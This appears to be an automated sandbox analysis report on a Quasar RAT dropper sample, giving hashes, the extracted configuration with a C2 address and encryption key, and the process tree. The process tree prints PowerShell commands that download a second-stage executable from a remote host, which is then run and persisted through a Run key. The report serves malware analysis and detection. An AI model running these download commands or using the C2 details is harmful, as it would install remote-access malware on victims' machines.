Analysis

max time kernel: 149s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-07-2024 02:36

Static task: static1
Behavioral task: behavioral1
Sample: jdconstructnOrderfdp..exe
Resource: win7-20240705-en
General

Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config

Extracted
Family: quasar
Version: 1.4.1
Botnet: Office04
C2: 192.228.105.2:4782
Mutex: 4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
Attributes:
  encryption_key: 0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
  install_name: jorder.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: svchost
  subdirectory: SubDir
Signatures

Quasar payload (2 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/488-42-0x00000000055B0000-0x00000000058D5000-memory.dmp | family_quasar
  behavioral2/memory/488-43-0x0000000006030000-0x0000000006354000-memory.dmp | family_quasar

Blocklisted process makes network request (2 IoCs)
Processes:
  flow | pid | process
  26 | 2828 | powershell.exe
  29 | 3956 | powershell.exe

Processes:
  pid | process
  2828 | powershell.exe
  3956 | powershell.exe

Downloads MZ/PE file

.NET Reactor protector (2 IoCs)
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe | net_reactor
  behavioral2/memory/488-35-0x0000000000210000-0x000000000027E000-memory.dmp | net_reactor

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | jdconstructnOrderfdp..exe

Executes dropped EXE (1 IoC)
Processes:
  pid | process
  488 | networkrunfdp.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" | networkrunfdp.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jdconstructnOrderfdp..exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | networkrunfdp.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid | process
  2828 | powershell.exe
  2828 | powershell.exe
  3956 | powershell.exe
  3956 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2828 | powershell.exe
  Token: SeDebugPrivilege | 3956 | powershell.exe
  Token: SeDebugPrivilege | 488 | networkrunfdp.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
  pid | process
  488 | networkrunfdp.exe
  488 | networkrunfdp.exe

Suspicious use of SendNotifyMessage (2 IoCs)
Processes:
  pid | process
  488 | networkrunfdp.exe
  488 | networkrunfdp.exe

Suspicious use of WriteProcessMemory (9 IoCs)
Processes:
  description | pid | process | target process
  PID 1520 wrote to memory of 1484 | 1520 | jdconstructnOrderfdp..exe | cmd.exe
  PID 1520 wrote to memory of 1484 | 1520 | jdconstructnOrderfdp..exe | cmd.exe
  PID 1484 wrote to memory of 2828 | 1484 | cmd.exe | powershell.exe
  PID 1484 wrote to memory of 2828 | 1484 | cmd.exe | powershell.exe
  PID 1484 wrote to memory of 3956 | 1484 | cmd.exe | powershell.exe
  PID 1484 wrote to memory of 3956 | 1484 | cmd.exe | powershell.exe
  PID 1484 wrote to memory of 488 | 1484 | cmd.exe | networkrunfdp.exe
  PID 1484 wrote to memory of 488 | 1484 | cmd.exe | networkrunfdp.exe
  PID 1484 wrote to memory of 488 | 1484 | cmd.exe | networkrunfdp.exe
Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
  PID: 1520
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (depth 2)
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\8D3D.tmp\8D3E.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    PID: 1484
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      PID: 2828
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
      PID: 3956
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe (depth 3)
      Command line: networkrunfdp.exe
      PID: 488
      - Executes dropped EXE
      - Adds Run key to start application
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Downloads